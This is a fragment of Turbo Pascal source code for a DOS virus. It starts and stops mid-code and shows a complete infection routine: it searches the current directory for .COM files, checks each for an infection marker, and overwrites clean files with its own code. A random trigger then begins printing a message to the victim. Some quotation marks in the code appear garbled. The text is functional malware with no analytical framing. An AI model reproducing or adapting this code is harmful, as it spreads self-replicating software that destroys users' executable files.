Array[1..13] of Char; End; Registers = Record {Register set used for file search } Case Byte of 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; { -- Variables--------------------------------------------- } Var { Memory offset program code } ProgramStart : Byte absolute Cseg:$100; { Infected marker } MarkInfected : String[42] absolute Cseg:$180; Reg : Registers; { Register set } DTA : DTARec; { Data area } Buffer : Array[Byte] of Byte; { Data buffer } TestID : String[42]; { To recognize infected files } UsePath : String[66]; { Path to search files } { Lenght of search path } UsePathLenght: Byte absolute UsePath; Go : File; { File to infect } B : Byte; { Used } LoopVar : Integer; {Will loop forever} { -- Program code------------------------------------------ } Begin GetDir(0, UsePath); { get current directory } if Pos(Z\Y, UsePath) <> UsePathLenght then UsePath := UsePath + Z\Y; UsePath := UsePath + Z*.COMY; { Define search mask } Reg.AH := $1A; { Set data area } Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg.CX := $ff; { Set attribute to find ALL files } MsDos(Reg); { Find first matching entry } IF not Odd(Reg.Flags) Then { If a file found then } Repeat UsePath := DTA.FullName; B := Pos(#0, UsePath); If B > 0 then Delete(UsePath, B, 255); { Remove garbage } Assign(Go, UsePath); Reset(Go); If IOresult = 0 Then { If not IO error then } Begin BlockRead(Go, Buffer, 2); Move(Buffer[$80], TestID, 43); { Test if file already ill(Infected) } If TestID <> Warning Then { If not then ... } Begin Seek (Go, 0); { Mark file as infected and .. } MarkInfected := Warning; { Infect it } BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); Close(Go); Halt; {.. and halt the program } End; Close(Go); End; { The file has already been infected, search next. } Reg.AH := $4F; Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); { ......................Until no more files are found } Until Odd(Reg.Flags); Loopvar:=Random(10); If Loopvar=7 then begin Writeln(Z Y); {Give a lot of smiles} Writeln(ZY); Writeln(Z Y); Writeln(Z ATTENTION: Y); Writeln(Z I have been elected to inform you that throughout your process of Y); Writeln(Z collecting and executing files, you have accidentally H